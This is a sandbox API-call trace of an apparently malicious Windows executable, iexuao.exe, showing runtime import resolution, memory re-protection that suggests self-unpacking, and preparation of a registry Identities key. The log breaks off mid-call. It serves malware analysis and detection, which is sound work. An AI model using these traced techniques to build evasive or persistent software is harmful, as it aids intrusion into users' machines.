# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 14.04.2020 09:49:00.433 Process: id = "1" image_name = "iexuao.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iexuao.exe" page_root = "0x4b971000" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexuao.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb0c [0041.667] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0041.667] GetModuleHandleA (lpModuleName="USER32") returned 0x77130000 [0041.667] GetModuleFileNameA (in: hModule=0x77130000, lpFilename=0x18fda7, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0041.667] IsProcessDPIAware () returned 1 [0041.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f7a4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexuao.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iexuao.exe")) returned 0x30 [0041.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fa9c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iexuao.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iexuao.exe")) returned 0x30 [0041.681] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0041.681] GetModuleFileNameA (in: hModule=0x76d30000, lpFilename=0x18fda7, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0041.681] GetBinaryTypeA (in: lpApplicationName="C:\\Windows\\syswow64\\kernel32.dll", lpBinaryType=0x18ff1c | out: lpBinaryType=0x18ff1c) returned 0 [0041.709] LdrGetProcedureAddress (in: BaseAddress=0x76d30000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x18facc | out: ProcedureAddress=0x18facc*=0x76d41856) returned 0x0 [0041.709] VirtualAlloc (lpAddress=0x0, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0041.712] LdrGetProcedureAddress (in: BaseAddress=0x76d30000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x18fbac | out: ProcedureAddress=0x18fbac*=0x76d41856) returned 0x0 [0041.712] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0041.714] LdrGetProcedureAddress (in: BaseAddress=0x76d30000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x18fac0 | out: ProcedureAddress=0x18fac0*=0x76d449d7) returned 0x0 [0041.715] LdrGetProcedureAddress (in: BaseAddress=0x76d30000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x18fac0 | out: ProcedureAddress=0x18fac0*=0x76d41222) returned 0x0 [0041.715] LdrGetProcedureAddress (in: BaseAddress=0x76d30000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x18fac0 | out: ProcedureAddress=0x18fac0*=0x76d41856) returned 0x0 [0041.715] LdrGetProcedureAddress (in: BaseAddress=0x76d30000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x18fac0 | out: ProcedureAddress=0x18fac0*=0x76d4435f) returned 0x0 [0041.715] VirtualAlloc (lpAddress=0x0, dwSize=0xf000, flAllocationType=0x1000, flProtect=0x4) returned 0x230000 [0041.718] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0041.718] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0041.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0041.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0041.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0041.718] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0041.719] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0041.720] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0041.720] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0041.720] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c40000 [0041.720] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0041.720] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0041.720] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0041.720] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0041.720] VirtualProtect (in: lpAddress=0x400000, dwSize=0x20000, flNewProtect=0x4, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x2) returned 1 [0041.896] VirtualProtect (in: lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x4) returned 1 [0041.896] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1053, flNewProtect=0x20, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x4) returned 1 [0041.896] VirtualProtect (in: lpAddress=0x403000, dwSize=0x2aa, flNewProtect=0x2, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x4) returned 1 [0041.896] VirtualProtect (in: lpAddress=0x404000, dwSize=0x70, flNewProtect=0x4, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x4) returned 1 [0041.896] VirtualProtect (in: lpAddress=0x405000, dwSize=0xe8, flNewProtect=0x4, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x4) returned 1 [0041.897] VirtualProtect (in: lpAddress=0x406000, dwSize=0x9000, flNewProtect=0x2, lpflOldProtect=0x18fca0 | out: lpflOldProtect=0x18fca0*=0x4) returned 1 [0041.898] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0041.898] GetProcessHeap () returned 0x4e0000 [0041.898] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1000) returned 0x4f1950 [0041.898] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5c [0041.899] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x8) returned 0x102 [0041.913] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x7) returned 0x102 [0041.929] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x6) returned 0x102 [0041.944] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x5) returned 0x102 [0041.960] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x4) returned 0x102 [0041.975] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x3) returned 0x102 [0042.150] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x2) returned 0x102 [0042.162] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0x1) returned 0x102 [0042.178] CloseHandle (hObject=0x5c) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xe299) returned 0x4f2958 [0042.183] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0042.186] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c40000 [0042.186] GetProcAddress (hModule=0x77c40000, lpProcName="_snprintf") returned 0x77d14760 [0042.186] GetProcAddress (hModule=0x77c40000, lpProcName="sprintf") returned 0x77d153c3 [0042.186] GetProcAddress (hModule=0x77c40000, lpProcName="strchr") returned 0x77c79c70 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="strcpy") returned 0x77cbc300 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="memmove") returned 0x77c78f50 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="NtCreateKey") returned 0x77c5fb30 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="NtDeleteValueKey") returned 0x77c60a34 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="RtlInitUnicodeString") returned 0x77c6e208 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetValueKey") returned 0x77c601b4 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationToken") returned 0x77c5fb98 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenProcessToken") returned 0x77c610b0 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="NtClose") returned 0x77c5f9d0 [0042.187] GetProcAddress (hModule=0x77c40000, lpProcName="wcstombs") returned 0x77d15835 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="_allmul") returned 0x77c82760 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="_aulldiv") returned 0x77c9b140 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationProcess") returned 0x77c5fac8 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="_wcsupr") returned 0x77d14f53 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryVirtualMemory") returned 0x77c5fbc8 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="_snwprintf") returned 0x77c72417 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="RtlNtStatusToDosError") returned 0x77c761ed [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="wcsrchr") returned 0x77c77ee9 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="memset") returned 0x77c6df20 [0042.188] GetProcAddress (hModule=0x77c40000, lpProcName="mbstowcs") returned 0x77cba152 [0042.189] GetProcAddress (hModule=0x77c40000, lpProcName="RtlImageNtHeader") returned 0x77c73164 [0042.189] GetProcAddress (hModule=0x77c40000, lpProcName="wcschr") returned 0x77c77f1c [0042.189] GetProcAddress (hModule=0x77c40000, lpProcName="memcpy") returned 0x77c62340 [0042.189] GetProcAddress (hModule=0x77c40000, lpProcName="RtlUnwind") returned 0x77c86d39 [0042.189] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0042.514] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrW") returned 0x77304640 [0042.514] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrA") returned 0x7731c45b [0042.514] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrIW") returned 0x773046e9 [0042.514] GetProcAddress (hModule=0x772f0000, lpProcName="StrChrA") returned 0x772fc5e6 [0042.514] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrIA") returned 0x772fd250 [0042.515] GetProcAddress (hModule=0x772f0000, lpProcName="StrTrimA") returned 0x7732e63c [0042.515] GetProcAddress (hModule=0x772f0000, lpProcName=0xb0) returned 0x77304266 [0042.515] GetProcAddress (hModule=0x772f0000, lpProcName="PathCombineW") returned 0x7730c39c [0042.515] GetProcAddress (hModule=0x772f0000, lpProcName="StrToIntExA") returned 0x7732e27e [0042.515] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0042.515] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0042.515] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0042.515] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0042.515] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0042.515] GetProcAddress (hModule=0x76d30000, lpProcName="CreateWaitableTimerA") returned 0x76dc4c24 [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="CreateWaitableTimerW") returned 0x76d6bacb [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForMultipleObjects") returned 0x76d44220 [0042.516] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="SetWaitableTimer") returned 0x76d6bb2f [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexW") returned 0x76d4424c [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0042.517] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="SwitchToThread") returned 0x76d5efec [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0042.519] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="ProcessIdToSessionId") returned 0x76d41275 [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0042.520] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0042.521] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0042.521] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0042.521] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0042.521] GetProcAddress (hModule=0x77130000, lpProcName="wsprintfW") returned 0x7716e061 [0042.521] GetProcAddress (hModule=0x77130000, lpProcName="wsprintfA") returned 0x7715ae5f [0042.521] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0042.521] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0042.522] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExW") returned 0x777246c8 [0042.522] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0042.522] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0042.522] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0042.522] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0042.522] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0042.523] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0042.523] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0042.523] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0044.718] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteW") returned 0x759e3c71 [0044.719] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0044.942] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0044.942] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0044.942] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x75620000 [0045.331] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpQueryHeaders") returned 0x7562ba51 [0045.331] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpReceiveResponse") returned 0x7562b262 [0045.331] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpSetTimeouts") returned 0x7562d143 [0045.331] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpQueryDataAvailable") returned 0x7563c5dd [0045.331] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpOpen") returned 0x756258b9 [0045.331] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpOpenRequest") returned 0x75624aea [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpSendRequest") returned 0x756279bd [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpWriteData") returned 0x7563abfd [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpQueryOption") returned 0x7563ec68 [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpCloseHandle") returned 0x75622c01 [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpConnect") returned 0x7562d9f5 [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpReadData") returned 0x7562cb9e [0045.332] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpSetOption") returned 0x75623f6c [0045.332] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75580000 [0045.568] GetProcAddress (hModule=0x75580000, lpProcName="DnsQuery_A") returned 0x755aa9bc [0045.569] GetProcAddress (hModule=0x75580000, lpProcName="DnsFree") returned 0x7558436b [0045.569] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0046.605] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0046.605] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0046.605] GetProcAddress (hModule=0x76620000, lpProcName="CoSetProxyBlanket") returned 0x76635ea5 [0046.605] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0046.605] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0046.605] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0047.028] GetProcAddress (hModule=0x76e40000, lpProcName=0x10) returned 0x76e5deeb [0047.029] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0047.029] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0047.029] GetProcAddress (hModule=0x76e40000, lpProcName=0xf) returned 0x76e5e263 [0047.030] VirtualProtect (in: lpAddress=0x240000, dwSize=0x1c0, flNewProtect=0x4, lpflOldProtect=0x18ff00 | out: lpflOldProtect=0x18ff00*=0x4) returned 1 [0047.030] VirtualProtect (in: lpAddress=0x241000, dwSize=0xb000, flNewProtect=0x20, lpflOldProtect=0x18ff00 | out: lpflOldProtect=0x18ff00*=0x4) returned 1 [0047.032] VirtualProtect (in: lpAddress=0x24c000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff00 | out: lpflOldProtect=0x18ff00*=0x4) returned 1 [0047.032] VirtualProtect (in: lpAddress=0x24d000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff00 | out: lpflOldProtect=0x18ff00*=0x4) returned 1 [0047.033] VirtualProtect (in: lpAddress=0x24e000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff00 | out: lpflOldProtect=0x18ff00*=0x4) returned 1 [0047.033] VirtualProtect (in: lpAddress=0x24f000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff00 | out: lpflOldProtect=0x18ff00*=0x4) returned 1 [0047.034] HeapCreate (flOptions=0x0, dwInitialSize=0x1000000, dwMaximumSize=0x0) returned 0x1f30000 [0047.305] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x1000) returned 0x2f107d0 [0047.306] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa0 [0047.306] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x8) returned 0x102 [0047.314] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x7) returned 0x102 [0047.326] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x6) returned 0x102 [0047.342] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x5) returned 0x102 [0047.357] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x4) returned 0x102 [0047.372] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x3) returned 0x102 [0047.400] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x2) returned 0x102 [0047.404] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0x1) returned 0x102 [0047.420] CloseHandle (hObject=0xa0) returned 1 [0047.420] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x100) returned 0x2f117d8 [0047.421] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77c40000 [0047.421] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0047.421] GetCurrentProcessId () returned 0xb08 [0047.421] OpenProcess (dwDesiredAccess=0x47a, bInheritHandle=0, dwProcessId=0xb08) returned 0xa0 [0047.422] NtOpenProcessToken (in: ProcessHandle=0xa0, DesiredAccess=0x8, TokenHandle=0x18fe9c | out: TokenHandle=0x18fe9c*=0xa4) returned 0x0 [0047.422] NtQueryInformationToken (in: TokenHandle=0xa4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fe90 | out: TokenInformation=0x0, ReturnLength=0x18fe90) returned 0xc0000023 [0047.422] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x24) returned 0x2f118e0 [0047.422] NtQueryInformationToken (in: TokenHandle=0xa4, TokenInformationClass=0x1, TokenInformation=0x2f118e0, TokenInformationLength=0x24, ReturnLength=0x18fe90 | out: TokenInformation=0x2f118e0, ReturnLength=0x18fe90) returned 0x0 [0047.422] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f118e0 | out: hHeap=0x1f30000) returned 1 [0047.422] NtClose (Handle=0xa4) returned 0x0 [0047.423] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0047.423] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2f11828 | out: lpSystemTimeAsFileTime=0x2f11828*(dwLowDateTime=0x4363050, dwHighDateTime=0x1d61242)) [0047.423] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x94) returned 0x2f118e0 [0047.423] _snwprintf (in: _Dest=0x2f118e0, _Count=0x4a, _Format="S-%u-%u" | out: _Dest="S-1-5") returned 5 [0047.423] _snwprintf (in: _Dest=0x2f118ea, _Count=0x45, _Format="-%u" | out: _Dest="-21") returned 3 [0047.423] _snwprintf (in: _Dest=0x2f118f0, _Count=0x42, _Format="-%u" | out: _Dest="-3388679973") returned 11 [0047.423] _snwprintf (in: _Dest=0x2f11906, _Count=0x37, _Format="-%u" | out: _Dest="-3930757225") returned 11 [0047.423] _snwprintf (in: _Dest=0x2f1191c, _Count=0x2c, _Format="-%u" | out: _Dest="-3770151564") returned 11 [0047.423] _snwprintf (in: _Dest=0x2f11932, _Count=0x21, _Format="-%u" | out: _Dest="-1000") returned 5 [0047.423] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x138) returned 0x2f11980 [0047.423] _snwprintf (in: _Dest=0x2f11980, _Count=0x4e, _Format="\\REGISTRY\\USER\\%s\\%s\\" | out: _Dest="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\") returned 73 [0047.424] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4e) returned 0x2f11ac0 [0047.424] _snwprintf (in: _Dest=0x2f11ac0, _Count=0x27, _Format="{%08X-%04X-%04X-%04X-%08X%04X}" | out: _Dest="{022B7998-1542-BEE5-32E6-4548B44849D1}") returned 38 [0047.424] lstrlenW (lpString="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\") returned 73 [0047.424] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0xe0) returned 0x2f11b18 [0047.425] lstrcpyW (in: lpString1=0x2f11b18, lpString2="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\" | out: lpString1="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\") returned="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\" [0047.425] lstrcatW (in: lpString1="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\", lpString2="{022B7998-1542-BEE5-32E6-4548B44849D1}" | out: lpString1="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\{022B7998-1542-BEE5-32E6-4548B44849D1}") returned="\\REGISTRY\\USER\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Identities\\{022B7998-1542-BEE5-32E6-4548B44849D1}" [0047.425] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f11ac0 | out: hHeap=0x1f30000) returned 1 [0047.425] HeapFree (in: hHeap=0x1f30000, dwFlags=0x0, lpMem=0x2f11980 | out: hHeap=0x1f30000) returned 1 [0047.425] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x7c) returned 0x2f11980 [0047.425] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x40) returned 0x2f11a08 [0047.426] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x111) returned 0x2f11c00 [0047.426] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x1cd) returned 0x2f11d20 [0047.426] lstrlenA (lpString="old new current version process thread id identity task disk keyboard monitor class archive drive message link template logic protocol console magic system software word byte timer window scale info char calc map print list section name lib access code guid build warning save load region column row language date day false true screen net info web server client search storage icon desktop mode project media spell work security explorer cache theme solution") returned 459 [0047.426] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x40c) returned 0x2f11ef8 [0047.426] RtlAllocateHeap (HeapHandle=0x1f30000, Flags=0x0, Size=0x4e) returned 0x2f11a50 [0047.427] _snwprintf 